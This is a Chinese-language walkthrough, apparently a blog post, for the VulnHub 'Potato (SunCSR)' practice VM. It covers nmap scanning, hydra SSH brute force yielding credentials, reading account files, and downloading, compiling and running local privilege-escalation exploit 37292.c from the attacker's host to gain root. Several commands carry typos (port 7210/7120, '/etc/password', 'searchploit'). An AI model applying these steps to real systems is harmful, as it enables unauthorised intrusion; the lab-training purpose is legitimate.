目录
下载地址:
Potato (SunCSR): 1 ~ VulnHub
https://www.vulnhub.com/entry/potato-suncsr-1,556/
主机发现
确认靶机与攻击机在一个网段

靶机窗口

信息收集
扫描当前网段存活的主机
arp-scan -l

nmap看看都开放了那些端口
nmap -A -p- -sS -sC -T4 10.4.7.140
-A:启用操作系统检测、版本检测、脚本扫描和路由跟踪
-p:加端口号(指定端口扫描)
-p-:扫描所有端口(1-65535)
-sS:执行SYN扫描,选择SYN扫描时的默认扫描类型
-sC:使用默认脚本集进行扫描,相当于--script=default
-T4:将时间模版设置为激进,增加时间值以加快扫描速度

端口信息:
80tcp协议:是一个运行Apache HTTP服务器版本为2.4.7,该服务器安装在Ubuntu操作系统上
7210tcp协议:是一个运行ssh6.6.1p1版本的2ubuntu2.13的服务器
访问下他的网页 10.4.7.140

跟他的靶机名一样是个土豆
渗透过程
ssh爆破他的7120端口
hydra ssh://10.4.7.140:7120 -l potato -P /usr/share/wordlists/john.lst -vV -f -t 32

目的是通过使用给定的用户名和密码字典文件尝试连接到 SSH 服务器(在 IP 地址 10.4.7.140,端口 7120)

通过爆破获得了一个用户的账号密码
用户名:potato
密码:letmein
然后远程登录一下(连接端口为7120)
ssh potato@10.4.7.140 -p 7120

看下都有哪些用户
cat /etc/password

通过之前的端口信息知道它用的是ubuntu的服务器
看下ubuntu的版本
cat /etc/*release

在kali里再打开一个终端,搜一下ubuntu 14.04版本的漏洞
searchploit ubuntu 14.04
searchploit 是一个漏洞查找工具

37292.c是一个利用漏洞的本地攻击代码,用于进行本地提权或执行其他操作
漏洞利用
将这个文件拷贝到当前目录
cp /usr/share/exploitdb/exploits/linux/local/37292.c .


然后再kali开启web服务
python3 -m http.server 80

再到potato里把文件下载下来
wget http://10.4.7.138/37292.c
wget:用于再网络上下载文件
10.4.7.138:kali的ip

使用gcc将37292.层进行编译成一个可执行文件,名为exp
gcc 37292.c -o exp

然后执行这个exp文件,就获得root权限了

flag


958

被折叠的 条评论
为什么被折叠?



